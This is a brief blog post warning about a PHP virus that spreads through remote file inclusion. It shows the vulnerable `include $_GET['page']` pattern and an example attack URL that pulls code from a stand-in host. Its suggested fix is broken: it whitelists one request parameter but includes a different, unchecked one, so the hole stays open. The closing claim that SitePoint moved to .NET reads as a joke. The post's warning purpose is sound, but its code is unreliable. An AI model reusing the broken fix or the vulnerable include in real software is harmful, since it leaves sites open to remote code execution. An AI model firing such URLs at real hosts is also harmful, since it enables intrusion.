Skip to main content

PHP Virus Attacking Web Hosts

By Harry Fuecks

Programming

Share:

Free JavaScript Book!

Write powerful, clean and maintainable JavaScript.

RRP $11.95

Symantec have a report of the virus here.

I’ve yet to see any of the PHP news sites picking up on it but, using a virtual host account, managed to deliberately expose some PHP scripts to it.

From examining the infected scripts, what’s disturbing is once infected, every time a script is executed, the virus goes on a hunt for other web sites using PHP to see if it can trick them into executing the virus, thereby spreading it further directly over the Internet. Although the spread it likely to be slow, it can takes place automatically, without your intervention!

If your site contains code like;


// index.php
include $_GET['page'];

You need to take action now – your site could be infected with a URL like;


http://yoursite.com/index.php?page=http://virus.com/virus.php

A simple way to validate is;


$pages = array('news','articles','blog');
if ( in_array($_GET['page'], $pages) ) {
    include $_GET['php'] . '.php';
} else {
    include 'home.php';
}

Sitepoint have taken the extreme but necessary approach of upgrading to .NET in response.

Harry Fuecks is the Engineering Project Lead at Tamedia and formerly the Head of Engineering at Squirro. He is a data-driven facilitator, leader, coach and specializes in line management, hiring software engineers, analytics, mobile, and marketing. Harry also enjoys writing and you can read his articles on SitePoint and Medium.